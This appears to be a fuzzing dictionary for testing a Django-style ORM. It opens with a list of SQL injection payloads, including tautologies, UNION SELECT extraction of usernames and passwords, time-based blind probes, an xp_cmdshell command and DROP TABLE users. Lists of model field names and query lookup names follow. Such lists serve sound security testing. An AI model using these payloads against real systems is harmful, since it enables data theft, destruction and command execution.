"' OR '1'='1"
"' OR 1=1 --"
"' OR 1=1#"
"' OR 1=1/*"
"' OR '1'='1' --"
"\" OR \"1\"=\"1"
"\" OR 1=1 --"
"\" OR 1=1#"
"\" OR 1=1/*"
"'; EXEC xp_cmdshell('whoami'); --"
"' UNION SELECT NULL, NULL, NULL --"
"' UNION SELECT 1, 'abc', NULL --"
"' UNION SELECT username, password FROM users --"
"' AND 1=2 UNION SELECT NULL, version() --"
"' AND 1=0 UNION SELECT table_name, column_name FROM information_schema.columns --"
"' AND ASCII(SUBSTRING(@@version, 1, 1)) = 77 --"
"'; DROP TABLE users; --"
"'; WAITFOR DELAY '0:0:5' --"
"' OR SLEEP(5) --"
"'||(SELECT pg_sleep(5))--"
"' OR 1=1 LIMIT 1 OFFSET 1 --"
"' OR EXISTS(SELECT * FROM users) --"
"' OR NOT EXISTS(SELECT * FROM users) --"
"' AND EXISTS(SELECT * FROM users WHERE username = 'admin') --"
"admin' --"
"admin' #"
"admin'/*"
"' or '' = '"
"') or ('1'='1"
"')) or (('1'='1"
"\")) or ((\"1\"=\"1"
"' AND '1'='1"
"' AND 'x'='x"
"' AND 1=1 --"
"' OR 1=1;--"
"' OR 'a'='a"
"' OR 1=1 ORDER BY 1--"
"' OR 1=1 ORDER BY 2--"
"' OR 1=1 ORDER BY 3--"
"' GROUP BY columnnames having 1=1 --"
"'; SELECT * FROM users --"
"' OR ''='"
"' or 0=0 --"
"' OR 'x'='x'; --"
"' or sleep(5)--"
"' OR benchmark(10000000,MD5(1))--"
"' UNION SELECT ALL FROM users --"



"employee_ptr_id"
"books"
"authors"
"friends"
"publisher"
"uuid_fk_id"
"ceo"
"num_chairs"
"end_datetime"
"age"
"employee_ptr"
"time"
"start_datetime"
"contact_id"
"pubdate"
"experiment_id"
"contact"
"adjusted_salary"
"original_opening"
"point_of_contact_id"
"midpoint"
"decimal_value"
"firstname"
"data"
"start_date"
"salary"
"result_time"
"secretary_id"
"end"
"duration"
"publisher_id"
"start_id"
"based_in_eu"
"uuid_fk"
"rating"
"num_awards"
"float"
"manager_id"
"point_of_contact"
"isbn"
"id"
"start_time"
"friday_night_closing"
"secretary"
"estimated_time"
"integer"
"name"
"end_id"
"experiment"
"lastname"
"num_employees"
"price"
"end_time"
"completed"
"end_date"
"scalar"
"pages"
"assigned"
"ceo_id"
"work_day_preferences"
"manager"
"start"
"uuid"
















# Lookups

"exact"
"iexact"
"contains"
"icontains"
"in"
"gt"
"gte"
"lt"
"lte"
"startswith"
"istartswith"
"endswith"
"iendswith"
"range"
"isnull"
"date"
"year"
"iso_year"
"month"
"day"
"week"
"week_day"
"iso_week_day"
"quarter"
"time"
"hour"
"minute"
"second"
"regex"
"iregex"








